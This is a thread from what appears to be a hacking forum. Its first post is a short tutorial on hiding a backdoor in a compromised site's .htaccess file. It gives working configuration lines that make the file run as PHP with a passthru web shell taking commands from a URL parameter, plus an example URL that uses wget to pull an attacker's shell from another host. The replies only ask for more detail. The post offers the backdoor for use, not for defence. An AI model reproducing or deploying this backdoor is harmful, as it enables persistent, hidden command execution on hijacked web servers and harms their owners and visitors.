Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Create Backdoor in .htaccess filter_list
Author
Message
Create Backdoor in .htaccess #1
Firstly,I want to say thank my friend Mr.Sample :Grin:

In this Tutorial we will create Backdoor in .htaccess(Hypertext access)

Go public_html in shell and need to edit the .htaccess. :Sarcastic:


PHP Code:
<Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php passthru($_GET['cmd']); ?>

Add or Save code in .htaccess. :Thumbs-Up:

[Image: image.jpg]

And need to type CMD Commands like this

yoursite.com/.htaccess?cmd=

For Shell Upolad

yoursite.com/.htaccess?cmd=wget -O hacker625.php http://yourothersitewithshell/yourshell.txt

[Image: image.jpg]

okay now you can access your shell..

[Image: image.png]
Have Fun :Sarcastic:

Reply

RE: Create Backdoor in .htaccess #2
I would appreciate full tutorial step by step. This looks like a quick tutorial with little explanation.

Reply

RE: Create Backdoor in .htaccess #3
Yes there is not much explained I agree.

Reply

RE: Create Backdoor in .htaccess #4
i am not getting it

Reply